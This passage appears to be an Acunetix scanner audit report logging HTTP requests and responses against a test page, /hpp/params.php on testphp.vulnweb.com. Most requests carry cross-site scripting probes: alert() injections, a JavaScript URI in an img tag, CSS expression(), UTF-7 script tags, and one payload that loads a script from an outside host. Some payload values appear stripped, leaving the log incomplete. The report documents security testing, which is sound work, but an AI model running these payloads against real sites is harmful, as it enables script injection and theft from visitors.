Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541705967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

75

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

76

/hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Acunetix Website Audit

77

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28541915967426%29%3B%22%3E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

78

/hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%3C/xss/*-*/style=xss:e/**/xpression(alert(542365967576))%3E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p="+src="http://testphp.acunetix.com/xss.js?542125967501"> &pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

79

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=

alert(542145967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%00'">alert(542165967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Acunetix Website Audit

80

Request GET /hpp/params.php?p=%00"'>alert(542175967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=>'>alert(541685967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541715967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Acunetix Website Audit

81

Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=-->alert(541725967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=email@somealert(541735967314)%3Bdomain.com&p p=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

82

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request Acunetix Website Audit

83

GET /hpp/params.php?p=valid&pp=%3C/xss/*-*/style=xss:e/**/xpression(alert(542255967538))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT %3D%22text%2Fhtml%3Bcharset%3DUTF-7%22%3E%3C%2FHEAD%3E%2BADw-ScRiPt%2BAD4-alert%28542045 967461%29%2BADsAPA-%2FScRiPt%2BAD4- HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%00'">alert(542055967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

84

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%00"'>alert(542065967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=

alert(542035967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp="+src="http://testphp.acunetix.com/xss.js?54201 5967461"> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

86

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=-->alert(541615967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541595967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28541645967314%2 9%3B%22%3E HTTP/1.0 Acunetix Website Audit

87

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=>">alert(541585967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541605967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close Acunetix Website Audit

88

/hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=email@somealert(541625967314)%3Bdom ain.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541565967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

89

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=>'>alert(541575967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

90

/hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=< /ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; 